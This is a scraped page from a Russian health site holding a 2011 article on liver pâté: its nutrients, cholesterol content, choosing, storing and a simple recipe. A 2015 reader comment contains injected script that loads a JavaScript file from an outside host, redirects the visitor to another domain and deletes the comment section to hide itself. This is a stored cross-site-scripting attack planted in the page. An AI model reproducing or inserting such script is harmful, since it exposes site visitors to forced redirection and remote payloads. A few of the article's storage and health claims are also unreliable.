Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Паштет: продукт-«обманщик...  >>  Паштет: продукт-«обманщик»
 
Обратная связь
 

Паштет: продукт-«обманщик»

Размер шрифта
27 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Паштет – это фарш из дичи, мяса, печени, яиц, грибов или трюфелей. На Украине и в России паштет обычно готовят из печени. Родиной паштета считается Франция.

Как делают паштет

Для начала печень чистят от желчных протоков и сосудов. Затем моют и удаляют пленки, в противном случае паштет будет горчить.

Достоинства

  1. В печени есть редкие аминокислоты: лизин, метионин и триптофан.

  2. Печень богата железом, фосфором, цинком и медью. Печеночный паштет рекомендуется женщинам и детям с железодефицитной анемией.

  3. В печени очень много витаминов: от А и Е до В12 и ниацина.

Печень нужно есть людям после операции. Гликоген, который содержится в печени, – это питательный материал для роста и развития тканей и клеток.

Недостатки

Помимо печени, в паштет кладут другие субпродукты, к примеру, а так же жир, лук, соль и специи. В консервы с паштетом кладут свиной жир и сливочное масло. Так что назвать паштет диетическим продуктом нельзя.

Паштет обычно едят с хлебом. У такого бутерброда очень высокий гликемический индекс, и вы быстрее проголодаетесь после него, будете есть больше, и прибавите в весе.

Пьедестал почета по содержанию холестерина
1. Яйцо – 570 мг
2. Паштет печеночный – 406 мг
3. Сливочное масло – 190 мг

В печени очень много холестерина, главного виновника образования атеросклеротических бляшек. Атеросклеротическая бляшка может стать неустойчивой и оторваться. Ее разрушение может привести к образованию тромба. Кровеносные сосуды становятся жестче, и хуже реагируют на изменения давления. Все это может привести к инсульту, инфаркту и смерти.

Как выбрать

  • Паштет должен быть однородным, цвет – варьироваться от розового до светло-коричневого с серым оттенком.
  • Если у паштета насыщенный темно-коричневый цвет, значит, в составе продукта есть искусственные красители.
  • Паштет должен быть сделан на костном жире, в его составе могут быть сливочное масло или свиное сало. Для паштета, как правило, используют говяжью печень.
  • В «правильном» паштете всегда только пять ингредиентов: мясо, печень, масло сливочное, соль и пряности. Никакого крахмала, муки, сухого молока и т.д. в составе продукта быть не может.

Как хранить

  • Печеночный паштет можно хранить в холодильнике до 2 лет.
  • После вскрытия банки переложите паштет в неметаллическую посуду, иначе продукт быстро испортится.
  • Через 3 часа после намазывания на бутерброд паштет заветривается. Так что подавайте угощение на стол сразу после приготовления.

Как готовить

  1. Очистить печень от пленок, прожилок, сосудов.

  2. Отварить и перемолоть в мясорубке, добавив специи.

  3. При желании можно добавить яйца, лук, морковь, масло и сливки.

  4. Запечь в духовке.


Видеосюжеты по теме:

Печеночный паштет. Продукт-обманщик

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Минеральная недостаточность   Минеральные вещества   Вегетарианство   Микроэлементы, дефицит которых ведет к обжорству  

Слайдшоу

1
Скажите: «сыыыр». Какой сыр съесть, чтобы жить
9 сладких парочек, которые спасут вас!
Лучшая еда для красоты

Тесты

Что вы знаете о почках?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.